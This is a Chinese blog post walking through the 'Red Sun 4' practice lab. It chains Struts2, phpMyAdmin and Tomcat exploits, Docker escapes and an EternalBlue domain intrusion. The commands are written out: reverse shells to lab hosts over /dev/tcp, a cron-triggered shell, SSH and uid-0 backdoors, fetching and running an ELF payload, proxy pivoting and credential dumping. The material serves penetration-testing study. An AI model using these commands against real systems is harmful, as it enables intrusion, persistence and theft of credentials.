<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sugarcrashx.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="实战于2021.9">
<meta property="og:type" content="article">
<meta property="og:title" content="红日四">
<meta property="og:url" content="https://sugarcrashx.github.io/2022/06/02/%E7%BA%A2%E6%97%A5%E5%9B%9B/index.html">
<meta property="og:site_name" content="SugarCrash!">
<meta property="og:description" content="实战于2021.9">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/dkoym3qDZNlQBbC.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/ERADjmwzS6dG3pP.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/H2JD85UW34ylzjr.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/foDlQkcH9ryLA1C.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/xQvc86Zob1ahyWM.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/Ep5iRAjysJrfn79.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/Nbf47KVt93pOwU8.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/G5hz7DFbsdvZYOr.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/bq6ckj57YBhU4WJ.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/cWGotsH5Vphn8A7.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/wFp9f87SozdUNrb.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/oJtugjNXhes4TAf.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/oJtugjNXhes4TAf.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/H9XPCa5hDUm7rdI.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/CYtISmB3ZUQkpir.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/zsS6y81Q2PvcOxi.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/LvmY1X2eRjsud3J.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/2kQMhGFZjaAHyne.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/FUgkuvh79WMPIZT.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/Xd6fCZ93JwR2ckr.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/dgVjXWcBxvCGe9U.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/roeasI8J2ERmWF6.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/MmHAsbFSwNo8idp.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/t7oO5mWGKiv1aqx.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/7UMdT3A6vNEbft5.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/7RlkVIqpCy3Qr5H.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/dWc7aZl5Q9YTHSO.png">
<meta property="article:published_time" content="2022-06-02T03:50:53.000Z">
<meta property="article:modified_time" content="2022-06-02T03:51:23.985Z">
<meta property="article:author" content="Lu1i丶">
<meta property="article:tag" content="内网靶场">
<meta property="article:tag" content="红日">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/05/29/dkoym3qDZNlQBbC.png">

<link rel="canonical" href="https://sugarcrashx.github.io/2022/06/02/%E7%BA%A2%E6%97%A5%E5%9B%9B/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>红日四 | SugarCrash!</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SugarCrash!</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录学习，想找个师傅带带我</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sugarcrashx.github.io/2022/06/02/%E7%BA%A2%E6%97%A5%E5%9B%9B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.PNG">
      <meta itemprop="name" content="Lu1i丶">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SugarCrash!">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          红日四
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-06-02 11:50:53 / 修改时间：11:51:23" itemprop="dateCreated datePublished" datetime="2022-06-02T11:50:53+08:00">2022-06-02</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">红日靶场</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/06/02/%E7%BA%A2%E6%97%A5%E5%9B%9B/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/06/02/%E7%BA%A2%E6%97%A5%E5%9B%9B/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>实战于2021.9</p>
<span id="more"></span>
<p>考察<br>strusts2&#x2F;s2-045漏洞利用<br>phpmyadmin getshell<br>tomcat 漏洞利用<br>docker逃逸<br>ms14-068<br>ssh密钥利用<br>流量转发<br>历史命令信息泄露<br>域渗透</p>
<h4 id="启动"><a href="#启动" class="headerlink" title="启动"></a>启动</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /home/ubuntu/Desktop/vulhub/struts2/s2-045 </span><br><span class="line">docker-compose up -d </span><br><span class="line"><span class="built_in">cd</span> /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/ </span><br><span class="line">docker-compose up -d </span><br><span class="line"><span class="built_in">cd</span> /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/ docker-compose up -d</span><br></pre></td></tr></table></figure>
<p>启动好之后，用kali做一个存活扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -T4 -A 192.168.135.5 -p 1-65535 -oN nmap.A</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/dkoym3qDZNlQBbC.png"><br>struts2 找到路径上传冰蝎马，连接成功<br><img src="https://s2.loli.net/2022/05/29/ERADjmwzS6dG3pP.png"><br><img src="https://s2.loli.net/2022/05/29/H2JD85UW34ylzjr.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">phpmyadmin未授权 4.8.1文件包含 </span><br><span class="line">漏洞影响 phpMyAdmin 4.8.0和4.8.1受到影响。 </span><br><span class="line">漏洞利用 </span><br><span class="line">利用条件：需要账号密码或者config模式 </span><br><span class="line">利用payload： </span><br><span class="line">访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd，</span><br><span class="line">可见/etc/passwd被读取</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/foDlQkcH9ryLA1C.png"><br>tomcat put写文件burp抓包修改头<br>PUT &#x2F;shell.jsp&#x2F; HTTP&#x2F;1.1<br>下面放冰蝎马，204的话就是上传成功了直接连就行了<br><img src="https://s2.loli.net/2022/05/29/xQvc86Zob1ahyWM.png"></p>
<h4 id="docker逃逸"><a href="#docker逃逸" class="headerlink" title="docker逃逸"></a>docker逃逸</h4><p>判断是否为docker环境<br>1、使用下面命令，查看是否存在 dockerrnv 文件<br><code>ls -alh /.dockerenv</code><br>2、查看系统进程的cgroup信息<br><code>cat /proc/1/cgroup</code></p>
<p><img src="https://s2.loli.net/2022/05/29/Ep5iRAjysJrfn79.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">挂载宿主机 </span><br><span class="line">当docker容器内拥有宿主机文件读写权限时，可以通过写ssh密钥、计划任务等方式达到逃逸。</span><br><span class="line">查看磁盘文件: fdisk -l </span><br><span class="line">新建目录以备挂载: mkdir /test </span><br><span class="line">将宿主机/dev/sda1 目录挂载至容器内 </span><br><span class="line">/test: mount /dev/sda1 /test </span><br><span class="line">即可写文件获取权限或数据</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">fdisk -l </span><br><span class="line"><span class="built_in">mkdir</span> /test </span><br><span class="line">mount /dev/sda1 /test </span><br><span class="line"><span class="built_in">ls</span> /test</span><br></pre></td></tr></table></figure>
<p>写入一个反弹shell脚本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">touch</span> /test/tmp/test.sh </span><br><span class="line"><span class="built_in">chmod</span> +x /test/tmp/test.sh </span><br><span class="line"><span class="built_in">ls</span> -ll /test/tmp/test.sh </span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;#!/bin/bash&quot;</span> &gt;&gt; /test/tmp/test.sh </span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;/bin/bash -i &gt;&amp; bash -i &gt;&amp; /dev/tcp/192.168.10.4/10011 0&gt;&amp;1&quot;</span> &gt;&gt; /test/tmp/test.sh </span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /test/tmp/test.sh </span><br><span class="line">或 </span><br><span class="line">sed -i <span class="string">&#x27;$a\/bin/bash -i &gt;&amp; bash -i &gt;&amp; /dev/tcp/192.168.10.4/10011 0&gt;&amp;1&#x27;</span> /test/tmp/test.sh </span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /test/tmp/test.sh</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sed -i &#x27;$a*/2 * * * * root bash /tmp/test.sh &#x27; /test/etc/crontab </span><br><span class="line">cat /test/etc/crontab</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/Nbf47KVt93pOwU8.png"><br><img src="https://s2.loli.net/2022/05/29/G5hz7DFbsdvZYOr.png"></p>
<h4 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h4><p>ssh软连接后门<br>原理 软连接后门的原理是利用了PAM配置文件的作用，将sshd文件软连接名称设置为su， 这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息（su）， 然而su在pam_rootok只检测uid 0即可认证成功，这样就导致了可以使用任意密码登录。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ln -sf /usr/sbin/sshd /tmp/su </span><br><span class="line">/tmp/su -oPort=888</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/bq6ckj57YBhU4WJ.png"><br>后面ssh软连接进去是普通权限，不会怎么提权，换了篇文章，思路是生成个elf先让他上线，当然上线的是docker里面没有 任何作用<br>CVE-2019-5736 docker逃逸exp</p>
<p>安装go环境 <a target="_blank" rel="noopener" href="https://www.cnblogs.com/sch01ar/p/7625607.html">https://www.cnblogs.com/sch01ar/p/7625607.html</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">wget -c https://storage.googleapis.com/golang/go1.8.3.linux-amd64.tar.gz </span><br><span class="line">tar -C /usr/local/ -xzf go1.8.3.linux-amd64.tar.gz </span><br><span class="line">vim /etc/profile </span><br><span class="line">source /etc/profile </span><br><span class="line"></span><br><span class="line">go version</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">进入poc的文件夹</span><br><span class="line">vim main.go </span><br><span class="line">修改payload为： </span><br><span class="line">var payload = &quot;#!/bin/bash \n bash -i &gt;&amp; /dev/tcp/192.168.31.96/6667 0&gt;&amp; 1&quot; </span><br><span class="line">编译 </span><br><span class="line">CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go </span><br><span class="line">编译出一个main的文件利用meterpreter上传到docker的home下 </span><br><span class="line">upload /root/CVE-2019-5736 /home </span><br><span class="line">kali监听 nc -lvp 6667 </span><br><span class="line">他娘的坑爹玩意儿没反应， </span><br><span class="line">查阅资料，原来是要等受害机重启docker触发payload </span><br><span class="line">执行一个 </span><br><span class="line">这个09是看docker ps 对应的tomcat前两位</span><br><span class="line">docker exec -lt 09 /bin/sh</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/cWGotsH5Vphn8A7.png"><br><img src="https://s2.loli.net/2022/05/29/wFp9f87SozdUNrb.png"><br><img src="https://s2.loli.net/2022/05/29/oJtugjNXhes4TAf.png"><br><img src="https://s2.loli.net/2022/05/29/oJtugjNXhes4TAf.png"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">利用–privileged特权模式逃逸 </span><br><span class="line">利用docker的特权模式来在宿主机硬盘中写入ssh私钥，实现ssh免密登录宿主机，从而实现对目标宿主机的控制 </span><br><span class="line">新建一个/hack目录用来挂载文件： </span><br><span class="line"><span class="built_in">mkdir</span> /hack </span><br><span class="line"><span class="built_in">ls</span> /dev </span><br><span class="line">mount /dev/sda1 /hack </span><br><span class="line"><span class="built_in">ls</span> /hack</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ls</span> /hack/home </span><br><span class="line">看一看隐藏文件.ssh文件夹 </span><br><span class="line"><span class="built_in">ls</span> -alh /hack/home/ubuntu </span><br><span class="line">kali创建hack.pub </span><br><span class="line">ssh-keygen -f hack </span><br><span class="line"><span class="built_in">chmod</span> 600 hack </span><br><span class="line"><span class="built_in">cat</span> hack.pub </span><br><span class="line">新建一个key.sh </span><br><span class="line">vim key.sh </span><br><span class="line">把<span class="built_in">echo</span> <span class="string">&#x27;写自己的hack.pub&#x27;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cp</span> -avx /hack/home/ubuntu/.ssh/id_rsa.pub /hack/home/ubuntu/.ssh/authorized_keys </span><br><span class="line"><span class="built_in">echo</span> <span class="string">&#x27;&#x27;</span> &gt; /hack/home/ubuntu/.ssh/authorized_keys </span><br><span class="line"><span class="built_in">cat</span> /hack/home/ubuntu/.ssh/authorized_keys </span><br><span class="line"></span><br><span class="line">python -m SimpleHTTPServer 80 开启web投递</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">到冰蝎里 </span><br><span class="line">wget http://192.168.135.4/key.sh </span><br><span class="line"><span class="built_in">chmod</span> 777 key.sh </span><br><span class="line">./key.sh </span><br><span class="line"><span class="built_in">ls</span> -alh </span><br><span class="line">/hack/home/ubuntu/.ssh 检查写进去没有 </span><br><span class="line"><span class="built_in">cat</span> /hack/home/ubuntu/.ssh/authorized_keys 用自己的私钥登录 </span><br><span class="line">ssh -i hack ubuntu@192.168.135.5 </span><br><span class="line">登录成功，</span><br><span class="line">看ip a 发现一个183网段</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/H9XPCa5hDUm7rdI.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">同样的web投递一个elf马 </span><br><span class="line">wget http://192.168.10.4/shell.elf </span><br><span class="line">chmod 777 shell.elf </span><br><span class="line">./shell.elf </span><br><span class="line">msf上线</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/CYtISmB3ZUQkpir.png"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sshuttle -vr ubuntu@192.168.135.5 192.168.183.0/24 --ssh-cmd <span class="string">&quot;ssh -i ./hack&quot;</span> </span><br><span class="line">ssh隧道代理</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ew_master代理 </span><br><span class="line">upload root/tools/ew_master/ew_for_linux64 /home/ubuntu</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/zsS6y81Q2PvcOxi.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ubuntu开启 </span><br><span class="line">nohup ./ew_for_linux64 -s ssocksd -l 1080 &amp;</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/LvmY1X2eRjsud3J.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">添加 uid 0 用户后门 </span><br><span class="line">useradd -p `openssl passwd 123456` -o -u 0 hacker</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">这次终于是主机上线了 </span><br><span class="line">然后就是正常的步骤做就行了 </span><br><span class="line">run get_local_subnet </span><br><span class="line">arp -a 扫到183网段 </span><br><span class="line">设路由 </span><br><span class="line">run autoroute -s 192.168.183.0/24 </span><br><span class="line">run autoroute -p </span><br><span class="line">background</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/2kQMhGFZjaAHyne.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">做存活扫描 </span><br><span class="line">use auxiliary/scanner/discovery/udp_probe </span><br><span class="line">set rhosts 192.168.183.0-255 </span><br><span class="line">set threads 5 </span><br><span class="line">run </span><br><span class="line">也可以用smb扫 </span><br><span class="line">use auxiliary/scanner/smb/smb_version </span><br><span class="line">set rhosts 192.168.183.0/24 </span><br><span class="line">set threads 5 </span><br><span class="line">run </span><br><span class="line">扫永恒之蓝 </span><br><span class="line">use auxiliary/scanner/smb/smb_ms17_010 set </span><br><span class="line">rhosts 192.168.183.129-130 </span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/FUgkuvh79WMPIZT.png"><br><img src="https://s2.loli.net/2022/05/29/Xd6fCZ93JwR2ckr.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">这里设置ew代理的时候 kali本机的vin /etc/pro那个文件要填ubuntu的地址并且改成socks5 </span><br><span class="line"></span><br><span class="line">msf里</span><br><span class="line">setg Proxies socks5:192.168.31.127:1080 ms17_010</span><br><span class="line">use exploit/windows/smb/ms17_010_eternalblue </span><br><span class="line">set payload windows/x64/meterpreter/bind_tcp </span><br><span class="line">set rhost 192.168.183.129 </span><br><span class="line">set lport 4444 set AutoRunScript post/windows/manage/migrate </span><br><span class="line">自动进程迁移 </span><br><span class="line"></span><br><span class="line">run </span><br><span class="line">打进192.168.183.129</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/dgVjXWcBxvCGe9U.png"></p>
<h5 id="内网信息收集常用命令"><a href="#内网信息收集常用命令" class="headerlink" title="内网信息收集常用命令"></a>内网信息收集常用命令</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">ipconfig /all   <span class="comment"># 查看本机ip，所在域</span></span><br><span class="line">route <span class="built_in">print</span>     <span class="comment"># 打印路由信息</span></span><br><span class="line">net view        <span class="comment"># 查看局域网内其他主机名</span></span><br><span class="line">arp -a          <span class="comment"># 查看arp缓存</span></span><br><span class="line">net start       <span class="comment"># 查看开启了哪些服务</span></span><br><span class="line">net share       <span class="comment"># 查看开启了哪些共享</span></span><br><span class="line">net share ipc$  <span class="comment"># 开启ipc共享</span></span><br><span class="line">net share c$    <span class="comment"># 开启c盘共享</span></span><br><span class="line">net use \\192.168.xx.xx\ipc$ <span class="string">&quot;&quot;</span> /user:<span class="string">&quot;&quot;</span>    <span class="comment"># 与192.168.xx.xx建立空连接</span></span><br><span class="line">net use \\192.168.xx.xx\c$ <span class="string">&quot;密码&quot;</span> /user:<span class="string">&quot;用户名&quot;</span>    <span class="comment"># 建立c盘共享</span></span><br><span class="line"><span class="built_in">dir</span> \\192.168.xx.xx\c$\user    <span class="comment"># 查看192.168.xx.xx c盘user目录下的文件</span></span><br><span class="line"></span><br><span class="line">net config Workstation    <span class="comment"># 查看计算机名、全名、用户名、系统版本、工作站、域、登录域</span></span><br><span class="line">net user                 <span class="comment"># 查看本机用户列表</span></span><br><span class="line">net user /domain         <span class="comment"># 查看域用户</span></span><br><span class="line">net localgroup administrators    <span class="comment"># 查看本地管理员组（通常会有域用户）</span></span><br><span class="line">net view /domain         <span class="comment"># 查看有几个域</span></span><br><span class="line">net user 用户名 /domain   <span class="comment"># 获取指定域用户的信息</span></span><br><span class="line">net group /domain        <span class="comment"># 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）</span></span><br><span class="line">net group 组名 /domain    <span class="comment"># 查看域中某工作组</span></span><br><span class="line">net time /domain           // 主域服务器会同时作为时间服务器</span><br><span class="line">net group <span class="string">&quot;domain admins&quot;</span> /domain  <span class="comment"># 查看域管理员的名字</span></span><br><span class="line">net group <span class="string">&quot;domain computers&quot;</span> /domain  <span class="comment"># 查看域中的其他主机名</span></span><br><span class="line">net group <span class="string">&quot;doamin controllers&quot;</span> /domain  <span class="comment"># 查看域控制器（可能有多台）</span></span><br><span class="line">net group <span class="string">&quot;Enterprise Admins&quot;</span> /domain    // 查看域管理员组</span><br></pre></td></tr></table></figure>
<p>mz64.exe运行<br><img src="https://s2.loli.net/2022/05/29/roeasI8J2ERmWF6.png"><br><img src="https://s2.loli.net/2022/05/29/MmHAsbFSwNo8idp.png"></p>
